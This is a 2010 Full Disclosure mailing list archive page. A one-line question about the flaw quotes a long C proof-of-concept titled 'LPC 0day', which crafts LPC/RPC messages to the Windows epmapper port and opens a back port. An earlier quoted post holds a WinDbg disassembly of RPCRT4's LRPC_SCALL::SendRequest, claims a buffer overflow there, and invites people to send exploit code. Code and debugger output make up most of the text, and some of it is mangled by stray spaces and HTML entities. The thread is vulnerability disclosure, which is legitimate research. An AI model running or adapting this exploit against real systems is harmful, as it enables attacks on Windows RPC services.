Full Disclosure mailing list archives
Re: LPC 0day
From: Richard Miles <richard.k.miles () googlemail com>
Date: Fri, 8 Oct 2010 07:03:40 -0500
Hi yuange Is it a flaw at Windows itself or a third party product? Thanks 2010/10/7 yuange <yuange1975 () hotmail com>
#include <windows.h>
#include <stdio.h>
//#include "ntdll.h"
//#pragma comment(lib,"ntdll.lib")
#pragma comment(lib,"advapi32.lib")
typedef enum _PROCESSINFOCLASS {
ProcessDebugPort=7// 7 Y Y
} PROCESSINFOCLASS;
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING ,*PUNICODE_STRING;
typedef struct _CLIENT_ID
{
HANDLE UniqueProcess;
HANDLE UniqueThread;
}CLIENT_ID,* PCLIENT_ID, **PPCLIENT_ID;
#define PORT_NAME_LEN 64
#define LRPC_CONNECT_REQUEST 0
#define LPC_CONNECTION_REQUEST 10
#define offset 0x100+0x4-0x6*4
#define MAXLEN 0x148
#define BACKNAME L"\\RPC Control\\back2"
#define RPCLPCNAME L"\\RPC Control\\epmapper"
#define BINDNAME L"back2"
typedef struct _LRPC_BIND_EXCHANGE
{
INT ConnectType ;
DWORD AssocKey ;
char szPortName[PORT_NAME_LEN] ;
RPC_SYNTAX_IDENTIFIER InterfaceId;
RPC_SYNTAX_IDENTIFIER TransferSyntax;
RPC_STATUS RpcStatus;
unsigned char fBindBack ;
unsigned char fNewSecurityContext ;
unsigned char fNewPresentationContext;
unsigned char PresentationContext;
unsigned char Pad[3];
unsigned long SecurityContextId;
} LRPC_BIND_EXCHANGE;
typedef struct _LPC_MESSAGE
{
USHORT DataSize;
USHORT MessageSize;
USHORT MessageType;
USHORT DataInfoOffset;
CLIENT_ID ClientId;
ULONG MessageId;
ULONG SectionSize;
// UCHAR & nbsp; Data[];
}LPC_MESSAGE, *PLPC_MESSAGE;
typedef struct _OBJECT_ATTRIBUTES
{
DWORD Length;
HANDLE RootDirectory;
PUNICODE_STRING ObjectName;
DWORD Attributes;
PVOID SecurityDescriptor;
PVOID SecurityQualityOfService;
}OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES, **PPOBJECT_ATTRIBUTES;
typedef
DWORD
(CALLBACK * NTCREATEPORT)(
OUT PHANDLE PortHandle,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN ULONG MaxConnectInfoLength,
IN ULONG MaxDataLength,
IN OUT PULONG Reserved OPTIONAL );
typedef
DWORD
(CALLBACK * NTREPLYWAITRECVIVEPORT)(
IN HANDLE PortHandle,
OUT PHANDLE ReceivePortHandle OPTIONAL,
IN PLPC_MESSAGE Reply OPTIONAL,
OUT PLPC_MESSAGE IncomingRequest );
typedef
DWORD
(CALLBACK * NTACCEPTCONNECTPORT) (
OUT PHANDLE PortHandle,
IN PVOID PortContext OPTIONAL,
IN PLPC_MESSAGE ConnectionRequest,
IN BOOLEAN AcceptConnection,
IN OUT int int1, // IN OUT PPORT_VIEW ServerView OPTIONAL,
OUT int int2 //OUT PREMOTE_PORT_VIEW ClientView OPTIONAL
);
typedef
DWORD
(CALLBACK * NTCONNECTPORT)(
OUT PHANDLE PortHandle,
IN PUNICODE_STRING PortName,
IN PSECURITY_QUALITY_OF_SERVICE SecurityQos,
IN OUT int int1,
// IN OUT PPORT_VIEW ClientView OPTIONAL,
IN OUT int int2,
// IN OUT PREMOTE_PORT_VIEW ServerView OPTIONAL,
OUT PULONG MaxMessageLength OPTIONAL,
IN OUT PVOID ConnectionInformation OPTIONAL,
IN OUT PULONG ConnectionInformationLength OPTIONAL
);
typedef
DWORD
(CALLBACK *NTREQUESTWAITREPLYPORT)( // NtRequestWaitReplyPort(
IN HANDLE PortHandle,
IN PLPC_MESSAGE Request,
OUT PLPC_MESSAGE IncomingReply );
typedef
DWORD
(CALLBACK *NTCOMPLETECONNECTPORT) (
IN HANDLE PortHandle
);
typedef
DWORD
(CALLBACK *RTLINITUNICODESTRING)(
PUNICODE_STRING DestinationString,
PCWSTR SourceString
);
typedef
DWORD
(CALLBACK * NTREPLYPORT)(
IN HANDLE PortHandle,
IN PLPC_MESSAGE Reply );
typedef
DWORD
(CALLBACK * NTSETINFORMATIONPROCESS)(
IN HANDLE ProcessHandle,
IN PROCESSINFOCLASS ProcessInformationClass,
IN PVOID ProcessInformation,
IN ULONG ProcessInformationLength );
typedef struct _DEBUG_MESSAGE
{
LPC_MESSAGE PORT_MSG;
DEBUG_EVENT DebugEvent;
}DEBUG_MESSAGE, *PDEBUG_MESSAGE;
NTSETINFORMATIONPROCESS NtSetInformationProcess;
NTREPLYWAITRECVIVEPORT NtReplyWaitReceivePort;
NTCREATEPORT NtCreatePort;
NTREPLYPORT NtReplyPort;
NTCONNECTPORT NtConnectPort;
RTLINITUNICODESTRING RtlInitUnicodeString;
NTREQUESTWAITREPLYPORT NtRequestWaitReplyPort;
NTACCEPTCONNECTPORT NtAcceptConnectPort;
NTCOMPLETECONNECTPORT NtCompleteConnectPort;
template <int i> struct PORT_MESSAGEX : LPC_MESSAGE {
UCHAR Data[i];
};
PROCESS_INFORMATION pi;
int server();
void initapi();
int main()
{
// LPC_MESSAGE Reply;
// HMODULE hNtdll;
// DWORD dwAddrList[9];
BOOL bExit = FALSE;
// DWORD dwRet;
// HANDLE hPort;
int k=0;
unsigned long i;
// DEBUG_MESSAGE dm;
OBJECT_ATTRIBUTES oa = {sizeof(oa)};
PORT_MESSAGEX<0x130> PortReply,PortRecv;
STARTUPINFO si={sizeof(si)};
// NTSTATUS
int Status;
PLPC_MESSAGE Request;
// PLPC_MESSAGE IncomingReply;
LPC_MESSAGE Message;
HANDLE LsaCommandPortHandle;
UNICODE_STRING LsaCommandPortName;
SECURITY_QUALITY_OF_SERVICE DynamicQos;
LRPC_BIND_EXCHANGE BindExchange;
DWORD Key=0x11223344;
unsigned long BindExchangeLength = sizeof(LRPC_BIND_EXCHANGE);
BindExchange.ConnectType = LRPC_CONNECT_REQUEST ;
BindExchange.AssocKey = Key;
// wcscpy((wchar_t *)&(BindExchange.szPortName),BINDNAME);
DynamicQos.ImpersonationLevel =SecurityAnonymous; //
SecurityImpersonation;
DynamicQos.ContextTrackingMode = SECURITY_STATIC_TRACKING;
//SECURITY_DYNAMIC_TRACKING;
DynamicQos.EffectiveOnly = TRUE;
initapi();
printf( "\r\nwindows lpc test!\r\n");
CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)server,0,0,&i);
//
// Connect to the Reference Monitor Command Port. This port
// is used to send commands from the LSA to the Reference Monitor.
//
RtlInitUnicodeString( &LsaCommandPortName,RPCLPCNAME);
Status = NtConnectPort(
&LsaCommandPortHandle,
&LsaCommandPortName,
&DynamicQos,
NULL,
NULL,
NULL, // &maxlen,
&BindExchange,
&Bi ndExchangeLength);
if ((Status)) {
exit(Status);
//print(("LsapRmInitializeServer - Connect to Rm Command Port
failed 0x%lx\n",Status));
// goto InitServerError;
}
// exit(0);
/*
//create port
dwRet = NtCreatePort(&hPort, &oa, 0, 0x148, 0);
if(dwRet != 0)
{
printf("create hPort failed. ret=%.8X\n", dwRet);
return 0;
}
//create process
if(!CreateProcess(0, "debugme.exe", NULL, NULL, TRUE,
CREATE_SUSPENDED, 0, 0, &si, &pi))
{
printf("CreateProcess failed:%d\n", GetLastError());
return 0;
}
//set debug port
dwRet = NtSetInformationProcess(pi.hProcess, ProcessDebugPort,
&hPort, sizeof(hPo rt));
if(dwRet != 0)
{
printf("set debug port error:%.8X\n", dwRet);
return 0;
}
//printf("pid:0x%.8X %d hPort=0x%.8X\n", pi.dwProcessId,
pi.dwProcessId, hPort);
ResumeThread(pi.hThread);
*/
while (true)
{
memset(&Message, 0, sizeof(Message));
Message.MessageSize=0x118;
Message.DataSize=0x100;
Message.MessageId=0x1122;
Request=&Message;
memset(&PortReply, 0, sizeof(PortReply));
// memcpy(&PortReply, &dm, sizeof(dm));
memset(&PortReply, 0, sizeof(PortReply));
// memcpy(&PortReply, &dm, sizeof(dm));
PortReply.MessageSize = 0x100;
PortReply.DataSize = 0x100-0x18;
PortReply.MessageType=0;
PortReply.MessageId=0x1122;
PortReply.Data[0]=0x0b;
PortReply.Data[1]=0;
PortReply.Data[2]=0;
PortReply.Data[3]=0;
PortReply.Data[4]=0;
wcscpy((wchar_t *)&(PortReply.Data[0x10]),BINDNAME);
Sleep(1000);
Status=NtRequestWaitReplyPort(LsaCommandPortHandle,&PortReply,&PortRecv);
//Reply);
// memcpy(&PortReply.Data[offset-4], &dwAddrList,
sizeof(dwAddrList));
PortReply.MessageSize = 0xa0;
PortReply.DataSize = 0xa0-0x18;
PortReply.MessageType=0;
PortReply.MessageId=0x1122;
PortReply.Data[0]=0x0;
PortReply.Data[1]=0;
PortReply.Data[2]=0;
PortReply.Data[3]=0;
PortReply.Data[4]=0;
memcpy((unsigned char *)&(PortReply.Data[0x0c]),
"\x80\xbd\xa8\xaf\x8a\x7d\xc9\x11\xbe\xf4\x08\x00\x2b\x10\x29\x89\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00",0x20);
//"\xe6\x73\x0c\xe6\xf9\x88\xcf\x11\x9a\xf1\x00\x20\xaf\x6e\x72\xf4\x02\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00",0x20);
// memcpy(&PortReply.Data[offset-4], &dwAddrList,
sizeof(dwAddrList));
_asm{
// die: jmp die
}
Sleep(1000);
Status=NtRequestWaitReplyPort(LsaCommandPortHandle,&PortReply,&PortRecv);
//Reply);
BindExchange=*(LRPC_BIND_EXCHANGE *)&(PortRecv.Data[8]);
if (!(Status))
{
while(1){
PortReply.MessageSize = 0x100;
PortReply.DataSize = 0x100-0x18;
PortReply.MessageType=0;
PortReply.MessageId=PortRecv.MessageId;
PortReply.Data[0]=0x01;
PortReply.Data[1]=0;
PortReply.Data[2]=0;
PortReply.Data[3]=0;
PortReply.Data[4]=0x3;
PortReply.Data[5]=0;
PortReply.Data[6]=0;
*(int *)(&(PortReply.Data[0x18]))=*(int
*)(&(PortRecv.Data[0x30]));
_asm{
// die: jmp die
}
Sleep(100);
Status=NtRequestWaitReplyPort(LsaCommandPortHandle,&PortReply,&PortRecv);
//Reply);
Sleep(0x7fffffff);
}
}
}
return 0;
}
int server()
{
BOOL bExit = FALSE;
DWORD dwRet;
// HANDLE hPort;
int k=0;
unsigned long maxlen;
// DEBUG_MESSAGE dm;
OBJECT_ATTRIBUTES oa = {sizeof(oa)};
PORT_MESSAGEX<0x130> PortReply,PortRecv;
STARTUPINFO si={sizeof(si)};
// NTSTATUS
int Status;
PLPC_MESSAGE Request;
PLPC_MESSAGE IncomingReply;
LPC_MESSAGE Message;
HANDLE BackPortHandle,NewHandle,NewAccHandle;
UNICODE_STRING BackPortName;
SECURITY_QUALITY_OF_SERVICE DynamicQos;
LRPC_BIND_EXCHANGE BindExchange;
DWORD Key=0x11223344;
unsigned long BindExchangeLength = sizeof(LRPC_BIND_EXCHANGE);
BindExchange.ConnectType = LRPC_CONNECT_REQUEST ;
BindExchange.AssocKey = Key;
DynamicQos.ImpersonationLevel =SecurityAnonymous; //
SecurityImpersonation;
DynamicQos.ContextTrackingMode = SECURITY_STATIC_TRACKING;
//SECURITY_DYNAMIC_TRACKING;
DynamicQos.EffectiveOnly = TRUE;
RtlInitUnicodeString( &BackPortName,BACKNAME);
memset(&oa,0,sizeof(oa));
oa.Length=0x18;
oa.ObjectName=&BackPortName;
oa.Attributes=0x40;
//InitializeObjectAttributes(&oa,&BackPortName,0x40,0,0);
//OBJ_CASE_INSENSITIVE,0,0); //SecurityDescriptor);
//create port
dwRet = NtCreatePort(&BackPortHandle, &oa,
sizeof(LRPC_BIND_EXCHANGE),MAXLEN, 0);
if(dwRet != 0)
{
printf("create hPort failed. ret=%.8X\n", dwRet);
// return 0;
}
while (true)
{
memset(&Message, 0, sizeof(Message));
Message.MessageSize=0x118;
Message.DataSize=0x100;
Message.MessageId=0x11;
Request=&Message;
memset(&PortReply, 0, sizeof(PortReply));
// memcpy(&PortReply, &dm, sizeof(dm));
PortReply.MessageSize = 0x148;
PortReply.DataSize = 0x130;
PortReply.MessageType=0;
PortReply.Data[0]=0x0b;
PortReply.Data[1]=0;
PortReply.Data[2]=0;
PortReply.Data[3]=0;
PortReply.Data[4]=0;
// memcpy(&PortReply.Data[offset-4], &dwAddrList,
sizeof(dwAddrList));
Status=NtReplyWaitReceivePort(BackPortHandle,0,0,&PortRecv);
//Reply);
if(PortRecv.MessageType==LPC_CONNECTION_REQUEST)
{
Status=NtAcceptConnectPort(&NewAccHandle, 0, &PortRecv,1, NULL, NULL);
Status=NtCompleteConnectPort (NewAccHandle);
memset(&PortRecv, 0, sizeof(PortRecv));
Status=NtReplyWaitReceivePort(NewAccHandle,0,0,&PortRecv);
//&PortReply,&PortRecv);
while(1)
{
PortRecv.MessageSize = 0x148;
PortRecv.DataSize = 0x130;
// PortReply.MessageId=PortRecv.MessageId;
_asm{
//die: jmp die
}
Status=NtReplyWaitReceivePort(NewAccHandle,0,&PortRecv,&PortRecv);
//&PortReply,&PortRecv);
Sleep(100);
Status=NtReplyWaitReceivePort(NewAccHandle,0,0,&PortRecv);
//&PortReply,&PortRecv);
}
}
}
}
void initapi()
{
HMODULE hNtdll;
//get native api address
hNtdll = LoadLibrary("ntdll.dll");
if(hNtdll == NULL)
{
printf("LoadLibrary failed:%d\n", GetLastError());
}
NtReplyWaitReceivePort = (NTREPLYWAITRECVIVEPORT)
GetProcAddress(hNtdll, "NtReplyWaitReceivePort");
NtCreatePort = (NTCREATEPORT)
GetProcAddress(hNtdll, "NtCreatePort");
NtReplyPort = (NTREPLYPORT)
GetProcAddress(hNtdll, "NtReplyPort");
NtSetInformationProcess = (NTSETINFORMATIONPROCESS)
GetProcAddress(hNtdll, "NtSetInformationProcess");
NtRequestWaitReplyPort= (NTREQUESTWAITREPLYPORT)
GetProcAddress(hNtdll,"NtRequestWaitReplyPort");
NtConnectPort = (NTCONNECTPORT)
GetProcAddress(hNtdll, "NtConnectPort");
NtCompleteConnectPort = (NTCOMPLETECONNECTPORT)
GetProcAddress(hNtdll, "NtCompleteConnectPort");
NtAcceptConnectPort = (NTACCEPTCONNECTPORT)
GetProcAddress(hNtdll, "NtAcceptConnectPort");
RtlInitUnicodeString=(RTLINITUNICODESTRING)
GetProcAddress(hNtdll,"RtlInitUnicodeString");
}
------------------------------
From: yuange1975 () hotmail com
To: full-disclosure () lists grok org uk
Subject: 0day analysis of the challenges
Date: Tue, 7 Sep 2010 12:38:27 +0000
0day analysis of the challenges
2010-08-05 20:32 2010-08-05 20:32
The following code has a buffer overflow, please write POC code analysis.
Code please send to yuange1975 () 139 com .
**
0:014> u RPCRT4!LRPC_SCALL::SendRequest 0:014> u RPCRT4! LRPC_SCALL::
SendRequest
RPCRT4!LRPC_SCALL::SendRequest: RPCRT4! LRPC_SCALL:: SendRequest:
77c4d4e6 8bff mov edi,edi 77c4d4e6 8bff mov edi, edi
77c4d4e8 55 push ebp 77c4d4e8 55 push ebp
77c4d4e9 8bec mov ebp,esp 77c4d4e9 8bec mov ebp, esp
77c4d4eb 81ec10010000 sub esp,110h 77c4d4eb 81ec10010000 sub esp,
110h
77c4d4f1 a16c86cb77 mov eax,dword ptr [RPCRT4!__security_cookie
(77cb86 77c4d4f1 a16c86cb77 mov eax, dword ptr [RPCRT4! __security_cookie
(77cb86
6c)] 6c)]
77c4d4f6 53 push ebx 77c4d4f6 53 push ebx
77c4d4f7 56 push esi 77c4d4f7 56 push esi
77c4d4f8 8945fc mov dword ptr [ebp-4],eax 77c4d4f8 8945fc mov
dword ptr [ebp-4], eax
0:014> u 0:014> u
RPCRT4!LRPC_SCALL::SendRequest+0x15: RPCRT4! LRPC_SCALL:: SendRequest +0
x15:
77c4d4fb 8b450c mov eax,dword ptr [ebp+0Ch] 77c4d4fb 8b450c
mov eax, dword ptr [ebp +0 Ch]
77c4d4fe 8bf1 mov esi,ecx 77c4d4fe 8bf1 mov esi, ecx
77c4d500 33c9 xor ecx,ecx 77c4d500 33c9 xor ecx, ecx
77c4d502 57 push edi 77c4d502 57 push edi
77c4d503 8b7d08 mov edi,dword ptr [ebp+8] 77c4d503 8b7d08 mov
edi, dword ptr [ebp +8]
77c4d506 bb00200000 mov ebx,2000h 77c4d506 bb00200000 mov ebx,
2000h
77c4d50b 8908 mov dword ptr [eax],ecx 77c4d50b 8908 mov
dword ptr [eax], ecx
77c4d50d 855f28 test dword ptr [edi+28h],ebx 7 7c4d50d 855f28
test dword ptr [edi +28 h], ebx
0:014> u 0:014> u
RPCRT4!LRPC_SCALL::SendRequest+0x2a: RPCRT4! LRPC_SCALL:: SendRequest +0
x2a:
77c4d510 8985f0feffff mov dword ptr [ebp-110h],eax 77c4d510
8985f0feffff mov dword ptr [ebp-110h], eax
77c4d516 898df8feffff mov dword ptr [ebp-108h],ecx 77c4d516
898df8feffff mov dword ptr [ebp-108h], ecx
77c4d51c 0f85422f0100 jne RPCRT4!LR PC_SCALL::SendRequest+0x38
(77c60464) 77c4d51c 0f85422f0100 jne RPCRT4! LRPC_SCALL:: SendRequest +0
x38 (77c60464)
77c4d522 8d86d8000000 lea eax,[esi+0D8h] 77c4d522 8d86d8000000 lea
eax, [esi +0 D8h]
77c4d528 3908 cmp dword ptr [eax],ecx 77c4d528 3908 cmp
dword ptr [eax], ecx
77c4d52a 740e je RPCRT4!LRPC_SCALL::SendRequest+0xaf
(77c4d53a) 77c4d52a 740e je RPCRT4! LRPC_SCALL:: SendRequest +0 xaf
(77c4d53a)
77c4d52c 398ef8000000 cmp dword ptr [esi+0F8h],ecx 77c4d52c
398ef8000000 cmp dword ptr [esi +0 F8h], ecx
77c4d532 8908 mov dword ptr [eax],ecx 77c4d532 8908 mov
dword ptr [eax], ecx
0:014> u 0:014> u
RPCRT4!LRPC_SCALL::SendRequest+0x75: RPCRT4! LRPC_SCALL:: SendRequest +0
x75:
77c4d534 0f845a2f0100 je RPCRT4!LRPC_SCALL::SendRequest+0x77
(77c60494) 77c4d534 0f845a2f0100 je RPCRT 4! LRPC_SCALL:: SendRequest +0
x77 (77c60494)
77c4d53a 8b86a4000000 mov eax,dword ptr [esi+0A4h] 77c4d53a
8b86a4000000 mov eax, dword ptr [esi +0 A4h]
77c4d540 f6401c04 test byte ptr [eax+1Ch],4 77c4d540 f6401c04
test byte ptr [eax +1 Ch], 4
77c4d544 0f84700f0000 je RPCRT4!LRPC_SCALL::SendRequest+0x1d8
(77c4e4ba) 77c4d544 0f84700f0000 je RPCRT4! LRPC_SCALL:: SendRequest +0
x1d8 (77c4e4ba)
77c4d54a 668b08 mov cx,word ptr [eax] 77c4d54a 668b08 mov cx,
word ptr [eax]
77c4d54d 6683c118 add cx,18h 77c4d54d 6683c118 add cx, 18h
77c4d551 66894802 mov word ptr [eax+2],cx 77c4d551 66894802 mov
word ptr [eax +2], cx
77c4d555 8b86a4000000 mov eax,dword ptr [esi+0A4h] 77c4d555
8b86a4000000 mov eax, dword ptr [esi +0 A4h]
0:014> u 0:014> u
RPCRT4!LRPC_SCALL::SendRequest+0xd0: RPCRT4! LRPC_SCALL:: SendRequest +0
xd0:
77c4d55b f6401d08 test byte ptr [eax+1Dh],8 77c4d55b f6401d08
test byte ptr [eax +1 Dh], 8
77c4d55f 0f856c2f0100 jne RPCRT4!LRPC_SCALL::SendRequest+0xd6
(77c604d1) 77c4d55f 0f856c2f0100 jne RPCRT4! LRPC_SCALL:: SendRequest +0
xd6 (77c604d1)
77c4d565 c6401802 mov byte ptr [eax+18h],2 77c4d565 c6401802
mov byte ptr [eax +18 h], 2
77c4d 569 8b86a4000000 mov eax,dword ptr [esi+0A4h] 77c4d569
8b86a4000000 mov eax, dword ptr [esi +0 A4h]
77c4d56f 8b4f0c mov ecx,dword ptr [edi+0Ch] 77c4d56f 8b4f0c
mov ecx, dword ptr [edi +0 Ch]
77c4d572 894840 mov dword ptr [eax+40h],ecx 77c4d572 894840
mov dword ptr [eax +40 h], ecx
77c4d575 8b86a4000000 mov eax,dword ptr [esi+0A4h] 77c4d575
8b86a4000000 mov eax, dword ptr [esi +0 A4h]
77c4d57b 8b8eb0000000 mov ecx,dword ptr [esi+0B0h] 77c4d57b
8b8eb0000000 mov ecx, dword ptr [esi +0 B0h]
0:014> u 0:014> u
RPCRT4!LRPC_SCALL::SendRequest+0xf8: RPCRT4! LRPC_SCALL:: SendRequest +0
xf8:
77c4d581 894834 mov dword ptr [eax+34h],ecx 77c4d581 894834
mov dword ptr [eax +34 h], ecx
77c4d584 8b86a4000000 mov eax,dword ptr [esi+0A4h] 77c4d584
8b86a4000000 mov eax, dword ptr [esi +0 A4h]
77c4d58a c6401900 mov byte ptr [eax+19h],0 77c4d58a c6401900
mov byte ptr [eax +19 h], 0
77c4d58e 8b86a4000000 mov eax,dword ptr [esi+0A4h] 77c4d58e
8b86a4000000 mov eax, dword ptr [esi +0 A4h]
77c4d594 80480540 or byte ptr [eax+5],40h 77c4d594 80480540 or
byte ptr [eax +5], 40h
77c4d598 8d85fcfeffff lea eax,[ebp-104h] 77c4d598 8d85fcfeffff lea
eax, [ebp-104h]
77c4d59e 50 push eax 77c4d59e 50 push eax
77c4d59f ffb6a4000000 push dword ptr [esi+0A4h] 77c4d59f
ffb6a4000000 push dword ptr [esi +0 A4h]
0:014> u 0:014> u
RPCRT4!LRPC_SCALL::SendRequest+0x11c: RPCRT4! LRPC_SCALL:: SendRequest +0
x11c:
77c4d5a5 8b869c000000 mov eax,dword ptr [esi+9Ch] 77c4d5a5
8b869c000000 mov eax, dword ptr [esi +9 Ch]
77c4d5ab ff7024 push dword ptr [eax+24h] 77c4d5ab ff7024 push
dword ptr [eax +24 h]
77c4d5ae ff15b410c277 call dword ptr
[RPCRT4!_imp__NtRequestWaitReplyPort 77c4d5ae ff15b410c277 call dword ptr
[RPCRT4! _imp__NtRequestWaitReplyPort
(77c210b4)] (77c210b4)]
77c4d5b4 8bc8 mov ecx,eax 77c4d5b4 8bc8 mov ecx, eax
77c4d5b6 b8000000c0 &n bsp; mov eax,0C0000000h 77c4d5b6 b8000000c0
mov eax, 0C0000000h
77c4d5bb 23c8 and ecx,eax 77c4d5bb 23c8 and ecx, eax
77c4d5bd 3bc8 cmp ecx,eax 77c4d5bd 3bc8 cmp ecx, eax
77c4d5bf 0f84152f0100 je RPCRT4!LRPC_SCALL::SendRequest+0x138
(77c604da) 77c4d5bf 0f84152f0100 je RPCRT4! LRPC_SCALL:: SendRequest +0
x138 (77c604da)
0:014> u 0:014> u
RPCRT4!LRPC_SCALL::SendRequest+0x16d: RPCRT4! LRPC_SCALL:: SendRequest +0
x16d:
77c4d5c5 855f28 test dword ptr [edi+28h],ebx 77c4d5c5 855f28
test dword ptr [edi +28 h], ebx
77c4d5c8 751f jne RPCRT4!LRPC_SCALL::SendRequest+0x191
(77c4d5e9) 77c4d5c8 751f jne RPCRT4! LRPC_SCALL:: SendRequest +0 x191
(77c4d5e9)
77c4d5ca 8b86a4000000 mov eax,dword ptr [esi+0A4h] 77c4d5ca
8b86a4000000 mov eax, dword ptr [esi +0 A4h]
77c4d5d0 8a4018 mov al,byte ptr [eax+18h] 77c4d5d0 8a4018 mov
al, byte ptr [eax +18 h]
77c4d5d3 3c10 cmp al,10h 77c4d5d3 3c10 cmp al, 10h
77c4d5d5 7412 je RPCRT4!LRPC_SCALL::SendRequest+0x191
(77c4d5e9) 77c4d5d5 7412 je RPCRT4! LRPC_SCALL:: SendRequest +0 x191
(77c4d5e9)
77c4d5d7 3c04 &nbs p; cmp al,4 77c4d5d7 3c04 cmp al, 4
77c4d5d9 740e je RPCRT4!LRPC_SCALL::SendRequest+0x191
(77c4d5e9) 77c4d5d9 740e je RPCRT4! LRPC_SCALL:: SendRequest +0 x191
(77c4d5e9)
0:014> u 0:014> u
RPCRT4!LRPC_SCALL::SendRequest+0x183: RPCRT4! LRPC_SCALL:: SendRequest +0
x183:
77c4d5db 8b4708 mov eax,dword ptr [edi+8] 77c4d5db 8b4708 mov
eax, dword ptr [edi +8]
77c4d5de 85c0 test eax,eax 77c4d5de 85c0 test eax, eax
77c4d5e0 7407 je RPCRT4!LRPC_SCALL::SendRequest+0x191
(77c4d5e9) 77c4d5e0 7407 je RPCRT4! LRPC_SCALL:: SendRequest +0 x191
(77c4d5e9)
77c4d5e2 50 push eax 77c4d5e2 50 push eax
77c4d5e3 e80da40000 call RPCRT4!operator delete (77c579f5) 7
7c4d5e3 e80da40000 call RPCRT4! Operator delete (77c579f5)
77c4d5e8 59 pop ecx 77c4d5e8 59 pop ecx
77c4d5e9 80bd14ffffff06 cmp byte ptr [ebp-0ECh],6 77c4d5e9
80bd14ffffff06 cmp byte ptr [ebp-0ECh], 6
77c4d5f0 0f85f60e0000 jne RPCRT4!LRPC_SCALL::SendRequest+0x1d0
(77c4e4ec) 77c4d5f0 0f85f60e0000 jne RPCRT4! LRPC_SCALL:: SendRequest +0
x1d0 (77c4e4ec)
0:014> u 0:014> u
RPCRT4!LRPC_SCALL::SendRequest+0x19a: RPCRT4! LRPC_SCALL:: SendRequest +0
x19a:
77c4d5f6 0fbf8516ffffff movsx eax,word ptr [ebp-0EAh] 77c4d5f6
0fbf8516ffffff movsx eax, word ptr [ebp-0EAh]
77c4d5fd 8b8df0feffff mov ecx,dword ptr [ebp-110h] 77c4d5fd
8b8df0feffff mov ecx, dword ptr [ebp-110h]
77c4d603 8901 mov dword ptr [ecx],eax 77c4d603 8901 mov
dword ptr [ecx], eax
77c4d605 8bb5f8feffff mov &nb sp; esi,dword ptr [ebp-108h] 77c4d605
8bb5f8feffff mov esi, dword ptr [ebp-108h]
77c4d60b 85f6 test esi,esi 77c4d60b 85f6 test esi, esi
77c4d60d 0f85ed2e0100 jne RPCRT4!LRPC_SCALL::SendRequest+0x1b3
(77c60500) 77c4d60d 0f85ed2e0100 jne RPCRT4! LRPC_SCALL:: SendRequest +0
x1b3 (77c60500)
77c4d613 33c0 xor eax,eax 77c4d613 33c0 xor eax, eax
77c4d615 8b4dfc &nb sp; mov ecx,dword ptr [ebp-4] 77c4d615
8b4dfc mov ecx, dword ptr [ebp-4]
0:014> u 0:014> u
RPCRT4!LRPC_SCALL::SendRequest+0x214: RPCRT4! LRPC_SCALL:: SendRequest +0
x214:
77c4d618 5f pop edi 77c4d618 5f pop edi
77c4d619 5e pop esi 77c4d619 5e pop esi
77c4d6 1a 5b pop ebx 77c4d61a 5b pop ebx
77c4d61b e810110000 call RPCRT4!__security_check_cookie (77c4e730)77c4d61b e810110000 call RPCRT4!
__security_check_cookie (77c4e730)
77c4d620 c9 leave 77c4d620 c9 leave
77c4d621 c20800 ret 8 77c4d621 c20800 ret 8
77c4d624 90 &nb sp; nop 77c4d624 90 nop
77c4d625 90 nop 77c4d625 90 nop
http://hi.baidu.com/yuange1975/blog/item/022dec5901af02272834f0fc.html
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- LPC 0day yuange (Oct 07)
- Re: LPC 0day Richard Miles (Oct 08)